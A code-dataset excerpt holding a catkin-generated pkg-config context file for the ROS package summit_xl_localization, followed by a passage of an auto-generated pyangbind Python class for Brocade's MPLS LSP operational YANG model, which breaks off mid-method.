f72ef61fc1dcc54611562b5350866141b7262a8c | 507 | py | Python | build/summit_xl_common/summit_xl_localization/catkin_generated/pkg.develspace.context.pc.py | Jam-cpu/Masters-Project---Final | 0b266b1f117a579b96507249f0a128d0e3cc082a | [
"BSD-3-Clause-Clear"
] | null | null | null | build/summit_xl_common/summit_xl_localization/catkin_generated/pkg.develspace.context.pc.py | Jam-cpu/Masters-Project---Final | 0b266b1f117a579b96507249f0a128d0e3cc082a | [
"BSD-3-Clause-Clear"
] | null | null | null | build/summit_xl_common/summit_xl_localization/catkin_generated/pkg.develspace.context.pc.py | Jam-cpu/Masters-Project---Final | 0b266b1f117a579b96507249f0a128d0e3cc082a | [
"BSD-3-Clause-Clear"
] | null | null | null | # generated from catkin/cmake/template/pkg.context.pc.in
# Catkin pkg-config context (auto-generated) for summit_xl_localization.
CATKIN_PACKAGE_PREFIX = ""
# ';'-separated list strings become Python lists; empty strings yield [].
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
# Catkin run dependencies, space-separated for pkg-config consumption.
PROJECT_CATKIN_DEPENDS = "robot_localization;roscpp;tf;tf2;tf2_ros;message_filters;std_msgs;std_srvs;geometry_msgs;nav_msgs;sensor_msgs;robotnik_msgs;mavros_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "summit_xl_localization"
PROJECT_SPACE_DIR = "/workspace/devel"
PROJECT_VERSION = "1.1.3"
| 56.333333 | 180 | 0.763314 |
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "robot_localization;roscpp;tf;tf2;tf2_ros;message_filters;std_msgs;std_srvs;geometry_msgs;nav_msgs;sensor_msgs;robotnik_msgs;mavros_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "summit_xl_localization"
PROJECT_SPACE_DIR = "/workspace/devel"
PROJECT_VERSION = "1.1.3"
| true | true |
f72ef6e9a81af96f8effa83530a460f9a5ebed9d | 38,041 | py | Python | pybind/slxos/v16r_1_00b/mpls_state/lsp/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/mpls_state/lsp/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/mpls_state/lsp/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import basic
import forwarding
import frr
import backup
import instances
import secondary_path
class lsp(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls-operational - based on the path /mpls-state/lsp. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: MPLS LSP operational information
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__lsp_name','__lsp_type','__bypass_lsp_type','__interface','__history','__basic','__forwarding','__frr','__backup','__instances','__secondary_path',)
_yang_name = 'lsp'
_rest_name = 'lsp'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__instances = YANGDynClass(base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__bypass_lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)
self.__lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)
self.__frr = YANGDynClass(base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__basic = YANGDynClass(base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__interface = YANGDynClass(base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__forwarding = YANGDynClass(base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__backup = YANGDynClass(base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__secondary_path = YANGDynClass(base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__history = YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-state', u'lsp']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'mpls-state', u'lsp']
def _get_lsp_name(self):
"""
Getter method for lsp_name, mapped from YANG variable /mpls_state/lsp/lsp_name (string)
YANG Description: LSP Name
"""
return self.__lsp_name
def _set_lsp_name(self, v, load=False):
"""
Setter method for lsp_name, mapped from YANG variable /mpls_state/lsp/lsp_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_name() directly.
YANG Description: LSP Name
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__lsp_name = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_name(self):
self.__lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_lsp_type(self):
"""
Getter method for lsp_type, mapped from YANG variable /mpls_state/lsp/lsp_type (lsp-type)
YANG Description: LSP Type
"""
return self.__lsp_type
def _set_lsp_type(self, v, load=False):
"""
Setter method for lsp_type, mapped from YANG variable /mpls_state/lsp/lsp_type (lsp-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_type() directly.
YANG Description: LSP Type
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_type must be of a type compatible with lsp-type""",
'defined-type': "brocade-mpls-operational:lsp-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)""",
})
self.__lsp_type = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_type(self):
self.__lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'regular': {'value': 1}, u'bypass': {'value': 2}},), is_leaf=True, yang_name="lsp-type", rest_name="lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='lsp-type', is_config=False)
def _get_bypass_lsp_type(self):
"""
Getter method for bypass_lsp_type, mapped from YANG variable /mpls_state/lsp/bypass_lsp_type (bypass-lsp-type)
YANG Description: Bypass LSP Type
"""
return self.__bypass_lsp_type
def _set_bypass_lsp_type(self, v, load=False):
"""
Setter method for bypass_lsp_type, mapped from YANG variable /mpls_state/lsp/bypass_lsp_type (bypass-lsp-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_type() directly.
YANG Description: Bypass LSP Type
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_type must be of a type compatible with bypass-lsp-type""",
'defined-type': "brocade-mpls-operational:bypass-lsp-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)""",
})
self.__bypass_lsp_type = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_type(self):
self.__bypass_lsp_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'dynamic-bypass': {'value': 2}, u'static-bypass': {'value': 1}},), is_leaf=True, yang_name="bypass-lsp-type", rest_name="bypass-lsp-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='bypass-lsp-type', is_config=False)
def _get_interface(self):
"""
Getter method for interface, mapped from YANG variable /mpls_state/lsp/interface (string)
YANG Description: Bypass LSP interface
"""
return self.__interface
def _set_interface(self, v, load=False):
"""
Setter method for interface, mapped from YANG variable /mpls_state/lsp/interface (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_interface is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interface() directly.
YANG Description: Bypass LSP interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interface must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__interface = t
if hasattr(self, '_set'):
self._set()
def _unset_interface(self):
self.__interface = YANGDynClass(base=unicode, is_leaf=True, yang_name="interface", rest_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_history(self):
"""
Getter method for history, mapped from YANG variable /mpls_state/lsp/history (string)
YANG Description: MPLS LSP history Information
"""
return self.__history
def _set_history(self, v, load=False):
"""
Setter method for history, mapped from YANG variable /mpls_state/lsp/history (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_history is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_history() directly.
YANG Description: MPLS LSP history Information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """history must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__history = t
if hasattr(self, '_set'):
self._set()
def _unset_history(self):
self.__history = YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="history", rest_name="history", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_basic(self):
"""
Getter method for basic, mapped from YANG variable /mpls_state/lsp/basic (container)
YANG Description: MPLS basic LSP operational information
"""
return self.__basic
def _set_basic(self, v, load=False):
"""
Setter method for basic, mapped from YANG variable /mpls_state/lsp/basic (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_basic is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_basic() directly.
YANG Description: MPLS basic LSP operational information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """basic must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__basic = t
if hasattr(self, '_set'):
self._set()
def _unset_basic(self):
self.__basic = YANGDynClass(base=basic.basic, is_container='container', presence=False, yang_name="basic", rest_name="basic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-basic', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_forwarding(self):
"""
Getter method for forwarding, mapped from YANG variable /mpls_state/lsp/forwarding (container)
YANG Description: MPLS LSP forwarding information
"""
return self.__forwarding
def _set_forwarding(self, v, load=False):
"""
Setter method for forwarding, mapped from YANG variable /mpls_state/lsp/forwarding (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_forwarding is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_forwarding() directly.
YANG Description: MPLS LSP forwarding information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """forwarding must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__forwarding = t
if hasattr(self, '_set'):
self._set()
def _unset_forwarding(self):
self.__forwarding = YANGDynClass(base=forwarding.forwarding, is_container='container', presence=False, yang_name="forwarding", rest_name="forwarding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-forwarding', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_frr(self):
"""
Getter method for frr, mapped from YANG variable /mpls_state/lsp/frr (container)
YANG Description: MPLS LSP FRR information
"""
return self.__frr
def _set_frr(self, v, load=False):
"""
Setter method for frr, mapped from YANG variable /mpls_state/lsp/frr (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_frr is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_frr() directly.
YANG Description: MPLS LSP FRR information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """frr must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__frr = t
if hasattr(self, '_set'):
self._set()
def _unset_frr(self):
self.__frr = YANGDynClass(base=frr.frr, is_container='container', presence=False, yang_name="frr", rest_name="frr", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-frr', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_backup(self):
"""
Getter method for backup, mapped from YANG variable /mpls_state/lsp/backup (container)
YANG Description: MPLS LSP detail backup information
"""
return self.__backup
def _set_backup(self, v, load=False):
"""
Setter method for backup, mapped from YANG variable /mpls_state/lsp/backup (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_backup is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_backup() directly.
YANG Description: MPLS LSP detail backup information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """backup must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__backup = t
if hasattr(self, '_set'):
self._set()
def _unset_backup(self):
self.__backup = YANGDynClass(base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_instances(self):
"""
Getter method for instances, mapped from YANG variable /mpls_state/lsp/instances (list)
YANG Description: MPLS LSP instancses information
"""
return self.__instances
def _set_instances(self, v, load=False):
"""
Setter method for instances, mapped from YANG variable /mpls_state/lsp/instances (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_instances is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_instances() directly.
YANG Description: MPLS LSP instancses information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """instances must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__instances = t
if hasattr(self, '_set'):
self._set()
def _unset_instances(self):
self.__instances = YANGDynClass(base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
def _get_secondary_path(self):
"""
Getter method for secondary_path, mapped from YANG variable /mpls_state/lsp/secondary_path (list)
YANG Description: MPLS LSP secondary path information
"""
return self.__secondary_path
def _set_secondary_path(self, v, load=False):
"""
Setter method for secondary_path, mapped from YANG variable /mpls_state/lsp/secondary_path (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_secondary_path is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secondary_path() directly.
YANG Description: MPLS LSP secondary path information
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
